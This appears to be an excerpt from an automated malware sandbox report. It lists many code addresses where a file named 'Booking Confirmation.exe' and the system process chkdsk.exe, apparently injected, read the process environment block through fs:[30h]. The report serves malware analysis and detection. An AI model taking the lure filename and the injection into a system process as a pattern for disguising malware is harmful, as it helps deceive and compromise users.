Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192AE44 mov eax, dword ptr fs:[00000030h]	5_2_0192AE44
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192AE44 mov eax, dword ptr fs:[00000030h]	5_2_0192AE44
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187766D mov eax, dword ptr fs:[00000030h]	5_2_0187766D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]	5_2_0188AE73
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]	5_2_0188AE73
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]	5_2_0188AE73
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]	5_2_0188AE73
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]	5_2_0188AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8CD6 mov eax, dword ptr fs:[00000030h]	8_2_04DB8CD6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA14FB mov eax, dword ptr fs:[00000030h]	8_2_04DA14FB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]	8_2_04D66CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]	8_2_04D66CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]	8_2_04D66CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF849B mov eax, dword ptr fs:[00000030h]	8_2_04CF849B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7C450 mov eax, dword ptr fs:[00000030h]	8_2_04D7C450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7C450 mov eax, dword ptr fs:[00000030h]	8_2_04D7C450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A44B mov eax, dword ptr fs:[00000030h]	8_2_04D1A44B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0746D mov eax, dword ptr fs:[00000030h]	8_2_04D0746D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]	8_2_04DB740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]	8_2_04DB740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]	8_2_04DB740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]	8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]	8_2_04D66C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]	8_2_04D66C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]	8_2_04D66C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]	8_2_04D66C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1BC2C mov eax, dword ptr fs:[00000030h]	8_2_04D1BC2C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]	8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]	8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]	8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov ecx, dword ptr fs:[00000030h]	8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]	8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]	8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D98DF1 mov eax, dword ptr fs:[00000030h]	8_2_04D98DF1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFD5E0 mov eax, dword ptr fs:[00000030h]	8_2_04CFD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFD5E0 mov eax, dword ptr fs:[00000030h]	8_2_04CFD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]	8_2_04DAFDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]	8_2_04DAFDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]	8_2_04DAFDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]	8_2_04DAFDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]	8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]	8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]	8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]	8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]	8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1FD9B mov eax, dword ptr fs:[00000030h]	8_2_04D1FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1FD9B mov eax, dword ptr fs:[00000030h]	8_2_04D1FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]	8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]	8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]	8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]	8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]	8_2_04D11DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]	8_2_04D11DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]	8_2_04D11DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D135A1 mov eax, dword ptr fs:[00000030h]	8_2_04D135A1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB05AC mov eax, dword ptr fs:[00000030h]	8_2_04DB05AC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB05AC mov eax, dword ptr fs:[00000030h]	8_2_04DB05AC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D07D50 mov eax, dword ptr fs:[00000030h]	8_2_04D07D50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D23D43 mov eax, dword ptr fs:[00000030h]	8_2_04D23D43
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D63540 mov eax, dword ptr fs:[00000030h]	8_2_04D63540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0C577 mov eax, dword ptr fs:[00000030h]	8_2_04D0C577
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0C577 mov eax, dword ptr fs:[00000030h]	8_2_04D0C577
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D6A537 mov eax, dword ptr fs:[00000030h]	8_2_04D6A537
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAE539 mov eax, dword ptr fs:[00000030h]	8_2_04DAE539
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]	8_2_04D14D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]	8_2_04D14D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]	8_2_04D14D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8D34 mov eax, dword ptr fs:[00000030h]	8_2_04DB8D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]	8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEAD30 mov eax, dword ptr fs:[00000030h]	8_2_04CEAD30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8ED6 mov eax, dword ptr fs:[00000030h]	8_2_04DB8ED6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D28EC7 mov eax, dword ptr fs:[00000030h]	8_2_04D28EC7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D9FEC0 mov eax, dword ptr fs:[00000030h]	8_2_04D9FEC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D136CC mov eax, dword ptr fs:[00000030h]	8_2_04D136CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF76E2 mov eax, dword ptr fs:[00000030h]	8_2_04CF76E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D116E0 mov ecx, dword ptr fs:[00000030h]	8_2_04D116E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7FE87 mov eax, dword ptr fs:[00000030h]	8_2_04D7FE87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D646A7 mov eax, dword ptr fs:[00000030h]	8_2_04D646A7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]	8_2_04DB0EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]	8_2_04DB0EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]	8_2_04DB0EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]	8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]	8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]	8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]	8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]	8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]	8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAAE44 mov eax, dword ptr fs:[00000030h]	8_2_04DAAE44
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAAE44 mov eax, dword ptr fs:[00000030h]	8_2_04DAAE44
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF766D mov eax, dword ptr fs:[00000030h]	8_2_04CF766D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]	8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]	8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]	8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]	8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]	8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A61C mov eax, dword ptr fs:[00000030h]	8_2_04D1A61C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A61C mov eax, dword ptr fs:[00000030h]	8_2_04D1A61C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]	8_2_04CEC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]	8_2_04CEC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]	8_2_04CEC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D18E00 mov eax, dword ptr fs:[00000030h]	8_2_04D18E00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1608 mov eax, dword ptr fs:[00000030h]	8_2_04DA1608
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D9FE3F mov eax, dword ptr fs:[00000030h]	8_2_04D9FE3F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEE620 mov eax, dword ptr fs:[00000030h]	8_2_04CEE620
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D237F5 mov eax, dword ptr fs:[00000030h]	8_2_04D237F5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]	8_2_04D67794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]	8_2_04D67794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]	8_2_04D67794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF8794 mov eax, dword ptr fs:[00000030h]	8_2_04CF8794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFEF40 mov eax, dword ptr fs:[00000030h]	8_2_04CFEF40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFFF60 mov eax, dword ptr fs:[00000030h]	8_2_04CFFF60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8F6A mov eax, dword ptr fs:[00000030h]	8_2_04DB8F6A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0F716 mov eax, dword ptr fs:[00000030h]	8_2_04D0F716
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7FF10 mov eax, dword ptr fs:[00000030h]	8_2_04D7FF10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7FF10 mov eax, dword ptr fs:[00000030h]	8_2_04D7FF10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB070D mov eax, dword ptr fs:[00000030h]	8_2_04DB070D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB070D mov eax, dword ptr fs:[00000030h]	8_2_04DB070D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A70E mov eax, dword ptr fs:[00000030h]	8_2_04D1A70E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A70E mov eax, dword ptr fs:[00000030h]	8_2_04D1A70E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE4F2E mov eax, dword ptr fs:[00000030h]	8_2_04CE4F2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE4F2E mov eax, dword ptr fs:[00000030h]	8_2_04CE4F2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1E730 mov eax, dword ptr fs:[00000030h]	8_2_04D1E730
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]	8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov ecx, dword ptr fs:[00000030h]	8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]	8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]	8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]	8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]	8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE58EC mov eax, dword ptr fs:[00000030h]	8_2_04CE58EC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9080 mov eax, dword ptr fs:[00000030h]	8_2_04CE9080
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D63884 mov eax, dword ptr fs:[00000030h]	8_2_04D63884
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D63884 mov eax, dword ptr fs:[00000030h]	8_2_04D63884
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1F0BF mov ecx, dword ptr fs:[00000030h]	8_2_04D1F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1F0BF mov eax, dword ptr fs:[00000030h]	8_2_04D1F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1F0BF mov eax, dword ptr fs:[00000030h]	8_2_04D1F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]	8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]	8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]	8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]	8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]	8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]	8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D290AF mov eax, dword ptr fs:[00000030h]	8_2_04D290AF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D00050 mov eax, dword ptr fs:[00000030h]	8_2_04D00050
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D00050 mov eax, dword ptr fs:[00000030h]	8_2_04D00050
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA2073 mov eax, dword ptr fs:[00000030h]	8_2_04DA2073
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB1074 mov eax, dword ptr fs:[00000030h]	8_2_04DB1074
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]	8_2_04D67016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]	8_2_04D67016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]	8_2_04D67016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB4015 mov eax, dword ptr fs:[00000030h]	8_2_04DB4015
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB4015 mov eax, dword ptr fs:[00000030h]	8_2_04DB4015
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]	8_2_04CFB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]	8_2_04CFB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]	8_2_04CFB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]	8_2_04CFB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]	8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]	8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]	8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]	8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]	8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]	8_2_04CEB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]	8_2_04CEB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]	8_2_04CEB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D741E8 mov eax, dword ptr fs:[00000030h]	8_2_04D741E8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12990 mov eax, dword ptr fs:[00000030h]	8_2_04D12990
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0C182 mov eax, dword ptr fs:[00000030h]	8_2_04D0C182
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A185 mov eax, dword ptr fs:[00000030h]	8_2_04D1A185
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]	8_2_04D651BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]	8_2_04D651BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]	8_2_04D651BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]	8_2_04D651BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D669A6 mov eax, dword ptr fs:[00000030h]	8_2_04D669A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D161A0 mov eax, dword ptr fs:[00000030h]	8_2_04D161A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D161A0 mov eax, dword ptr fs:[00000030h]	8_2_04D161A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0B944 mov eax, dword ptr fs:[00000030h]	8_2_04D0B944
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0B944 mov eax, dword ptr fs:[00000030h]	8_2_04D0B944
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEC962 mov eax, dword ptr fs:[00000030h]	8_2_04CEC962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB171 mov eax, dword ptr fs:[00000030h]	8_2_04CEB171
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB171 mov eax, dword ptr fs:[00000030h]	8_2_04CEB171
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]	8_2_04CE9100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]	8_2_04CE9100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]	8_2_04CE9100
